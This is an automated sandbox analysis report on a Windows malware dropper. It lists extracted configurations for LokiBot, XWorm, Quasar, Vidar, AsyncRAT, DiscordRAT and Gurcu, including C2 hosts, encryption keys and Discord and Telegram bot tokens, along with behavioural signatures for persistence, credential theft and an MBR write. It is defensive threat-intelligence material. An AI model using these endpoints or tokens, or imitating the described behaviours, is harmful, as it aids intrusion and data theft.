Resubmissions
25/01/2025, 23:19
250125-3a9dlavrfq 1025/01/2025, 00:39
250125-azr7dswras 1025/01/2025, 00:32
250125-avsblawpdx 1025/01/2025, 00:29
250125-as5h5swnfv 1004/12/2024, 19:44
241204-yftswatlcj 1028/11/2024, 19:40
241128-ydqnfaxqgy 1020/11/2024, 16:31
241120-t1tw6azjfy 1020/11/2024, 06:05
241120-gtdv5ssnes 1020/11/2024, 06:00
241120-gqchxascje 1020/11/2024, 05:52
241120-gk2kvaxkgn 10Analysis
-
max time kernel
858s -
max time network
862s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
25/01/2025, 23:19
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe.zip
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
lokibot
http://bauxx.xyz/mtk1/w2/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Extracted
xworm
HITROL-60505.portmap.host:60505
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
quasar
1.4.1
Office04
192.168.1.101:4782
20f2b2b5-8392-4fbe-9585-0778c516b863
-
encryption_key
3A9499E06EC8E749CF7AE8F7D466BD97D9B2380C
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ZJEB
VIPEEK1990-25013.portmap.host:25013
ad21b115-2c1b-40cb-adba-a50736b76c21
-
encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Service
-
subdirectory
SubDir
Extracted
vidar
https://t.me/sc1phell
https://steamcommunity.com/profiles/76561199819539662
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Extracted
discordrat
-
discord_token
MTAyOTM3NzcyMzcxNTU1OTQ2NA.G7rtDA.iVKPgXW9sMwRqiFimO_Rdc0nXAigNycwugkM4k
-
server_id
696661218521251871
Extracted
xworm
5.0
0.tcp.eu.ngrok.io:10358
6.tcp.eu.ngrok.io:10358
4.tcp.eu.ngrok.io:10358
QvDYkhYsc5WBgCcl
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
SolaraFake
anyone-blogging.gl.at.ply.gg:22284
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
Windows.exe
-
install_folder
%Temp%
Extracted
gurcu
https://api.telegram.org/bot6338125361:AAFHgK-I9epBYaZIY8qosT_ZBDd6uU7zgHc/sendMessage?chat_id=1242905715
Signatures
-
Asyncrat family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/files/0x0003000000025712-6018.dat family_vidar_v7 behavioral2/memory/5380-6030-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/5380-6521-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral2/files/0x002000000002ab87-123.dat family_xworm behavioral2/memory/1188-144-0x0000000000010000-0x000000000002C000-memory.dmp family_xworm behavioral2/files/0x001900000002ac28-298.dat family_xworm behavioral2/memory/4332-303-0x0000000000BB0000-0x0000000000C40000-memory.dmp family_xworm behavioral2/files/0x000400000002512d-11555.dat family_xworm behavioral2/memory/8656-11560-0x00000000002B0000-0x00000000002C0000-memory.dmp family_xworm -
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Gurcu family
-
Lokibot family
-
Quasar family
-
Quasar payload 5 IoCs
resource yara_rule behavioral2/files/0x002000000002ac02-273.dat family_quasar behavioral2/memory/1984-281-0x0000000000AF0000-0x0000000000E14000-memory.dmp family_quasar behavioral2/files/0x0003000000000687-732.dat family_quasar behavioral2/memory/1708-737-0x0000000000190000-0x00000000004B4000-memory.dmp family_quasar behavioral2/files/0x001e00000002add0-14250.dat family_quasar -
Vidar family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x002100000002abc3-11699.dat family_asyncrat -
Blocklisted process makes network request 4 IoCs
flow pid Process 168 7256 powershell.exe 234 7256 powershell.exe 287 7256 powershell.exe 295 7256 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Powershell Invoke Web Request.
pid Process 6092 powershell.exe 2820 powershell.exe 4656 powershell.exe 4772 powershell.exe 224 powershell.exe 5320 powershell.exe 6704 powershell.exe 5640 powershell.exe 5884 powershell.exe 1592 powershell.exe 2092 powershell.exe 3272 powershell.exe 4516 powershell.exe 6092 powershell.exe 4364 powershell.exe 3796 powershell.exe 9016 powershell.exe 3684 powershell.exe 2704 powershell.exe 2272 powershell.exe 3400 powershell.exe 1176 powershell.exe -
Downloads MZ/PE file 30 IoCs
flow pid Process 329 5048 4363463463464363463463463.exe 62 2396 calendar.exe 88 5048 4363463463464363463463463.exe 531 5048 4363463463464363463463463.exe 8 5048 4363463463464363463463463.exe 60 4076 WEBDOWN.EXE 532 3860 cabal.exe 5 5048 4363463463464363463463463.exe 55 5048 4363463463464363463463463.exe 57 5176 calendar.exe 71 5048 4363463463464363463463463.exe 373 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 6 5048 4363463463464363463463463.exe 98 5048 4363463463464363463463463.exe 98 5048 4363463463464363463463463.exe 98 5048 4363463463464363463463463.exe 98 5048 4363463463464363463463463.exe 389 5048 4363463463464363463463463.exe 515 5048 4363463463464363463463463.exe 381 5048 4363463463464363463463463.exe 475 5048 4363463463464363463463463.exe 530 5048 4363463463464363463463463.exe 41 5048 4363463463464363463463463.exe 58 5176 calendar.exe -
Drops file in Drivers directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts stub.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts phost.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4272 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 456 takeown.exe 2624 icacls.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 8492 attrib.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 6 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5352 msedge.exe 5276 msedge.exe 760 chrome.exe 1988 chrome.exe 2804 chrome.exe 6052 msedge.exe -
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2588 powershell.exe 3616 cmd.exe 4008 powershell.exe 6032 cmd.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9d3a575fdcc2dd1782d18ac5655a8b28.exe svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9d3a575fdcc2dd1782d18ac5655a8b28.exe svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NVIDIA.lnk Helper.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NVIDIA.lnk Helper.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 984 cluton.exe 2316 cluton.exe 2960 main1.exe 1188 svchost.exe 4908 main1.exe 3204 phost.exe 2332 phost.exe 1984 Gorebox%20ModMenu%201.2.0.exe 4332 Helper.exe 5220 rar.exe 2928 alphaTweaks.exe 1700 NVIDIA.exe 4068 svchost.exe 5484 NVIDIA.exe 4992 svchost.exe 1708 seksiak.exe 5024 ipscan.exe 5724 seksiak.exe 5492 seksiak.exe 5976 seksiak.exe 1556 seksiak.exe 5844 seksiak.exe 1948 NVIDIA.exe 4080 svchost.exe 5128 seksiak.exe 484 5.exe 5692 5.exe 4836 seksiak.exe 200 seksiak.exe 6060 seksiak.exe 5176 calendar.exe 4076 WEBDOWN.EXE 2396 calendar.exe 2608 seksiak.exe 5152 seksiak.exe 5288 GLP_installer_900223086_market.exe 2580 NVIDIA.exe 5996 svchost.exe 5124 seksiak.exe 5600 seksiak.exe 6084 seksiak.exe 960 seksiak.exe 1660 seksiak.exe 5504 seksiak.exe 5508 NVIDIA.exe 868 svchost.exe 3188 seksiak.exe 460 seksiak.exe 4780 seksiak.exe 332 seksiak.exe 5124 seksiak.exe 5220 seksiak.exe 1148 NVIDIA.exe 2976 svchost.exe 3492 A.I_1003H.exe 5248 A.I.exe 3724 seksiak.exe 5656 seksiak.exe 5588 UNICO-Venta3401005.exe 5380 noyjhoadw.exe 6084 Client-built.exe 764 seksiak.exe 2144 seksiak.exe 4128 seksiak.exe -
Loads dropped DLL 64 IoCs
pid Process 984 cluton.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 4908 main1.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 2332 phost.exe 5692 5.exe 5692 5.exe 5692 5.exe 5692 5.exe 5692 5.exe 5692 5.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2624 icacls.exe 456 takeown.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cluton.exe Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook cluton.exe Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cluton.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\"" idmans.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\ProgramData\\NVIDIA.exe" Helper.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\9d3a575fdcc2dd1782d18ac5655a8b28 = "\"C:\\Windows\\svchost.exe\" .." svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9d3a575fdcc2dd1782d18ac5655a8b28 = "\"C:\\Windows\\svchost.exe\" .." svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\"" vncgroups.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\"" vncgroups.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows\CurrentVersion\Run\idmans-KXQ59W = "\"C:\\ProgramData\\idmans\\idmans.exe\"" idmans.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: GLP_installer_900223086_market.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 39 IoCs
flow ioc 180 drive.google.com 335 4.tcp.eu.ngrok.io 329 raw.githubusercontent.com 362 6.tcp.eu.ngrok.io 399 raw.githubusercontent.com 469 4.tcp.eu.ngrok.io 28 discord.com 258 6.tcp.eu.ngrok.io 279 pastebin.com 399 pastebin.com 410 4.tcp.eu.ngrok.io 52 pastebin.com 94 pastebin.com 179 drive.google.com 399 0.tcp.eu.ngrok.io 221 4.tcp.eu.ngrok.io 288 0.tcp.eu.ngrok.io 515 raw.githubusercontent.com 1 raw.githubusercontent.com 97 raw.githubusercontent.com 135 4.tcp.eu.ngrok.io 144 0.tcp.eu.ngrok.io 402 pastebin.com 413 0.tcp.eu.ngrok.io 1 discord.com 98 raw.githubusercontent.com 389 raw.githubusercontent.com 399 drive.google.com 413 6.tcp.eu.ngrok.io 142 6.tcp.eu.ngrok.io 281 pastebin.com 347 0.tcp.eu.ngrok.io 399 4.tcp.eu.ngrok.io 410 6.tcp.eu.ngrok.io 533 6.tcp.eu.ngrok.io 1 pastebin.com 6 raw.githubusercontent.com 181 drive.google.com 341 0.tcp.eu.ngrok.io -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 399 ip-api.com 1 ip-api.com 4 ip-api.com 24 ip-api.com 92 ip-api.com 133 ip-api.com 279 ip-api.com 393 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 GLP_installer_900223086_market.exe -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf svchost.exe File opened for modification C:\autorun.inf svchost.exe File created D:\autorun.inf svchost.exe File created F:\autorun.inf svchost.exe File opened for modification F:\autorun.inf svchost.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\SubDir x.exe File created C:\Windows\system32\SubDir\x.exe x.exe File opened for modification C:\Windows\system32\SubDir\x.exe x.exe File opened for modification C:\Windows\system32\SubDir x.exe File opened for modification C:\Windows\system32\SubDir\x.exe x.exe -
Enumerates processes with tasklist 1 TTPs 10 IoCs
pid Process 2696 tasklist.exe 5192 tasklist.exe 1116 tasklist.exe 2040 tasklist.exe 5912 tasklist.exe 2668 tasklist.exe 4640 tasklist.exe 4080 tasklist.exe 2488 tasklist.exe 4268 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4992 cmd.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 984 set thread context of 2316 984 cluton.exe 79 PID 4104 set thread context of 3368 4104 xworm.exe 624 -
resource yara_rule behavioral2/memory/2332-255-0x00007FFD301C0000-0x00007FFD30890000-memory.dmp upx behavioral2/memory/2332-262-0x00007FFD3EB40000-0x00007FFD3EB65000-memory.dmp upx behavioral2/memory/2332-263-0x00007FFD47F30000-0x00007FFD47F3F000-memory.dmp upx behavioral2/memory/2332-268-0x00007FFD3E7D0000-0x00007FFD3E7FD000-memory.dmp upx behavioral2/memory/2332-278-0x00007FFD3E7B0000-0x00007FFD3E7C5000-memory.dmp upx behavioral2/memory/2332-280-0x00007FFD2E670000-0x00007FFD2EB92000-memory.dmp upx behavioral2/memory/2332-284-0x00007FFD2FAC0000-0x00007FFD2FC37000-memory.dmp upx behavioral2/memory/2332-283-0x00007FFD31540000-0x00007FFD31564000-memory.dmp upx behavioral2/memory/2332-286-0x00007FFD3EB30000-0x00007FFD3EB3D000-memory.dmp upx behavioral2/memory/2332-285-0x00007FFD38D30000-0x00007FFD38D49000-memory.dmp upx behavioral2/memory/2332-282-0x00007FFD38D50000-0x00007FFD38D69000-memory.dmp upx behavioral2/memory/2332-291-0x00007FFD3E850000-0x00007FFD3E85D000-memory.dmp upx behavioral2/memory/2332-293-0x00007FFD2F9A0000-0x00007FFD2FABB000-memory.dmp upx behavioral2/memory/2332-292-0x00007FFD3E7D0000-0x00007FFD3E7FD000-memory.dmp upx behavioral2/memory/2332-290-0x00007FFD3EB40000-0x00007FFD3EB65000-memory.dmp upx behavioral2/memory/2332-289-0x00007FFD30A10000-0x00007FFD30ADD000-memory.dmp upx behavioral2/memory/2332-288-0x00007FFD31500000-0x00007FFD31533000-memory.dmp upx behavioral2/memory/2332-287-0x00007FFD301C0000-0x00007FFD30890000-memory.dmp upx behavioral2/memory/2332-331-0x00007FFD3E7B0000-0x00007FFD3E7C5000-memory.dmp upx behavioral2/memory/2332-332-0x00007FFD2E670000-0x00007FFD2EB92000-memory.dmp upx behavioral2/memory/2332-467-0x00007FFD31540000-0x00007FFD31564000-memory.dmp upx behavioral2/memory/2332-468-0x00007FFD2FAC0000-0x00007FFD2FC37000-memory.dmp upx behavioral2/memory/2332-608-0x00007FFD31500000-0x00007FFD31533000-memory.dmp upx behavioral2/memory/2332-609-0x00007FFD30A10000-0x00007FFD30ADD000-memory.dmp upx behavioral2/memory/2332-629-0x00007FFD2E670000-0x00007FFD2EB92000-memory.dmp upx behavioral2/memory/2332-632-0x00007FFD2FAC0000-0x00007FFD2FC37000-memory.dmp upx behavioral2/memory/2332-624-0x00007FFD301C0000-0x00007FFD30890000-memory.dmp upx behavioral2/memory/2332-625-0x00007FFD3EB40000-0x00007FFD3EB65000-memory.dmp upx behavioral2/memory/2332-662-0x00007FFD2E670000-0x00007FFD2EB92000-memory.dmp upx behavioral2/memory/2332-671-0x00007FFD2F9A0000-0x00007FFD2FABB000-memory.dmp upx behavioral2/memory/2332-678-0x00007FFD2FAC0000-0x00007FFD2FC37000-memory.dmp upx behavioral2/memory/2332-677-0x00007FFD31540000-0x00007FFD31564000-memory.dmp upx behavioral2/memory/2332-676-0x00007FFD3E7B0000-0x00007FFD3E7C5000-memory.dmp upx behavioral2/memory/2332-675-0x00007FFD3E7D0000-0x00007FFD3E7FD000-memory.dmp upx behavioral2/memory/2332-674-0x00007FFD47F30000-0x00007FFD47F3F000-memory.dmp upx behavioral2/memory/2332-673-0x00007FFD3EB40000-0x00007FFD3EB65000-memory.dmp upx behavioral2/memory/2332-672-0x00007FFD301C0000-0x00007FFD30890000-memory.dmp upx behavioral2/memory/2332-670-0x00007FFD3E850000-0x00007FFD3E85D000-memory.dmp upx behavioral2/memory/2332-669-0x00007FFD30A10000-0x00007FFD30ADD000-memory.dmp upx behavioral2/memory/2332-668-0x00007FFD31500000-0x00007FFD31533000-memory.dmp upx behavioral2/memory/2332-667-0x00007FFD3EB30000-0x00007FFD3EB3D000-memory.dmp upx behavioral2/memory/2332-666-0x00007FFD38D30000-0x00007FFD38D49000-memory.dmp upx behavioral2/memory/2332-663-0x00007FFD38D50000-0x00007FFD38D69000-memory.dmp upx behavioral2/files/0x0003000000000689-748.dat upx behavioral2/memory/5024-753-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-758-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-763-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-780-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-785-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-790-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-795-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-886-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-891-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5024-1127-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/files/0x001b00000002abc3-1310.dat upx behavioral2/memory/5248-1318-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral2/memory/5248-5899-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral2/files/0x000d00000002b678-6325.dat upx behavioral2/memory/5248-11530-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral2/memory/5024-12765-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/5336-13247-0x00007FFD2A620000-0x00007FFD2AC83000-memory.dmp upx behavioral2/memory/5336-13249-0x00007FFD494F0000-0x00007FFD494FF000-memory.dmp upx behavioral2/memory/5336-13248-0x00007FFD3E7D0000-0x00007FFD3E7F7000-memory.dmp upx behavioral2/memory/5336-13250-0x00007FFD490F0000-0x00007FFD49109000-memory.dmp upx -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File opened for modification C:\Windows\svchost.exe njSilent.exe File opened for modification C:\Windows\svchost.exe svchost.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\svchost.exe njSilent.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4440 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 4012 mshta.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral2/files/0x001b00000002ab78-70.dat pyinstaller behavioral2/files/0x0006000000000695-801.dat pyinstaller behavioral2/files/0x000800000002a767-13224.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 7280 4104 WerFault.exe 622 -
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language idmans.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UNICO-Venta3401005.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A.I_1003H.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njSilent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GLP_installer_900223086_market.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language noyjhoadw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cabal.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A.I.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calendar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xworm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vncgroups.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipscan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WEBDOWN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4dismhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cluton.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language calendar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara_Protect.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
